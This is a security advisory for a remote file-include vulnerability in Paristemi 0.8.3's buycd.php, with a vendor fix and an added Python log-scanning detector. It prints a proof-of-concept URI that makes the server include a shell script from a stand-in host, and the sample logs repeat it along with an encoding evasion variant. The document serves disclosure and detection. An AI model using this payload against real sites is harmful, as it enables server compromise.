Paristemi BuyCD.PHP Remote File Include Vulnerability
BID:21665
Info
| Bugtraq ID: | 21665 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 19 2006 12:00AM |
| Updated: | Dec 22 2006 12:03AM |
| Credit: | nuffsaid <[email protected]> is credited with the discovery of this vulnerability. |
| Vulnerable: | Paristemi Paristemi 0.8.3 |
| Not Vulnerable: | Paristemi Paristemi 0.8.4 |
Discussion
Paristemi is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
Exploiting this issue may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
Version 0.8.3 is vulnerable to this issue; other versions may also be affected.
Exploit / POC
An attacker can exploit this issue via a web client.
The following proof-of-concept URI is available:
http://www.example.com/music/buycd.php?HTTP_DOCUMENT_ROOT=http://www.example2.com/shell.php?
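To help operators spot attempts against this issue in web server access logs, here is an added detection example (not part of the original advisory or the Paristemi project). It scans constructed combined-log-format lines for query parameters whose value carries a remote URL scheme, which is how the proof-of-concept URI above delivers its payload, and rates hits on the HTTP_DOCUMENT_ROOT parameter of buycd.php as high.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample access-log lines (combined log format); not real traffic.
# Line 2 mirrors the advisory's proof-of-concept URI, line 3 is the same
# request with the scheme percent-encoded to evade naive string matching.
SAMPLE_LOG = """\
10.0.0.5 - - [19/Dec/2006:10:01:02 +0000] "GET /music/buycd.php?id=12 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [19/Dec/2006:10:01:07 +0000] "GET /music/buycd.php?HTTP_DOCUMENT_ROOT=http://www.example2.com/shell.php? HTTP/1.1" 200 88 "-" "curl/7.15"
10.0.0.9 - - [19/Dec/2006:10:01:09 +0000] "GET /music/buycd.php?HTTP_DOCUMENT_ROOT=%68ttp%3A%2F%2Fwww.example2.com%2Fshell.php HTTP/1.1" 200 88 "-" "curl/7.15"
10.0.0.7 - - [19/Dec/2006:10:02:00 +0000] "GET /music/index.php?page=news HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
"""

# Request line inside the quoted part of a combined-format log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/')
# Stream wrappers PHP's include() can resolve to non-local content.
REMOTE_SCHEME_RE = re.compile(r'^\s*(?:https?|ftps?|php|data):', re.IGNORECASE)

# The file and parameter named in the advisory's proof-of-concept URI.
VULNERABLE_SCRIPT = "/buycd.php"
VULNERABLE_PARAM = "HTTP_DOCUMENT_ROOT"


def rfi_findings(log_text):
    """Return (path, param, decoded_value, severity) for each suspicious parameter."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.search(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        for name, value in parse_qsl(parts.query, keep_blank_values=True):
            # parse_qsl already decoded once; decode again to catch
            # double-encoded values, then look for a remote scheme prefix.
            decoded = unquote(value)
            if not REMOTE_SCHEME_RE.match(decoded):
                continue
            if parts.path.endswith(VULNERABLE_SCRIPT) and name == VULNERABLE_PARAM:
                severity = "high"      # matches this advisory exactly
            else:
                severity = "review"    # generic RFI-style parameter, needs triage
            findings.append((parts.path, name, decoded, severity))
    return findings


if __name__ == "__main__":
    for finding in rfi_findings(SAMPLE_LOG):
        print(finding)
```

Legitimate parameters that carry URLs (redirect targets, feed readers) will also surface as "review" hits, so pair the generic rule with an allow-list of known parameter names before alerting on it.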
Solution / Fix
Solution:
The vendor has released an update to address this issue. The vendor recommends deleting the '/music/buycd.php' file from the server.
Paristemi Paristemi 0.8.3
- Paristemi paristemi-0_8_4.zip: http://downloads.sourceforge.net/paristemi/paristemi-0_8_4.zip
References
References:
- Paristemi 0.8.4 - Preventative Measure For Vulnerability (Paristemi)
- Paristemi Home Page (Paristemi)